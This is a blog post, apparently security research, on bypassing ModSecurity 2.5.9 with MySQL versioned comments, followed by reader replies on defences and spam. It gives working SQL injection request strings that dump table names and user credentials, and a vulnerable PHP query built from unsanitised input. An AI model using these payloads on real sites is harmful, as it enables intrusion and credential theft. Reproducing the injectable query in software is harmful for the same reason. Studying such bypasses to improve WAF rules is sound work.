MySQL servers allow one to use comments of the following type:
/*!sql-code*/ and /*!12345sql-code*/
As can be noticed, SQL code will be executed from the comment in both cases! The latter construction means that "sql-code" should be executed only if the DBMS version is later than the given value.
As I have been repeatedly asserted [1,2], some WAFs skip comments during signature search. Among such WAFs, there is the latest stable assembly of Mod_Security (v. 2.5.9).
Here is a simple example:
...
$query = "SELECT name FROM table where id = ".$_GET[id];
$result = mysql_query($query);
...
If a web application is protected with Mod_Security, then the following request will be forbidden:
/?id=1+union+select+1
It is remarkable that even these requests (that are incorrect in the considered example) will be also forbidden by the WAF (HPP/HPF techniques):
/?id=1+union/*&id=*/select+table_name+from+information_schema.columns
/?id=1+union/*&blabla1=*/select+table_name&blabla2=from+information_schema.columns

But if we use the described method with comments, Mod_Security will allow our requests and we will be able to exploit an SQL Injection:
/?id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/
/?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/
/?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/
Well, one more method to our arsenal :-)
Nice catch. It's easy to defend against, though -- just look for the "/*!" sequence in input.
ReplyDeleteAdditionally, you mention that v2.5.9 is the latest version, but v2.5.10 has been out stable for some time now. But, as Ivan mentioned above, you still need to edit the rules to look for "/*!".
ReplyDeleteThanks for the great article and work.
I believe that 2.5.10 rules catch this (CRS v2.0.2). Thanks!
ReplyDeleteThank you for this template...... web application
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteI am impressed by the quality of information on this website. There are a lot of good resources here. Video Marketing
ReplyDeleteApp Marketing
Thanks for sharing informative post. Mobile application development | Software Development Company
ReplyDeleteConveyed a complex material in a simple manner. Great job. Hendrick Honda Of Charleston
ReplyDeleteThis is a really great post, thanks for sharing. I’m glad I got a chance to check out your blog!
ReplyDeletethanks,
aishwarya actress
This comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDelete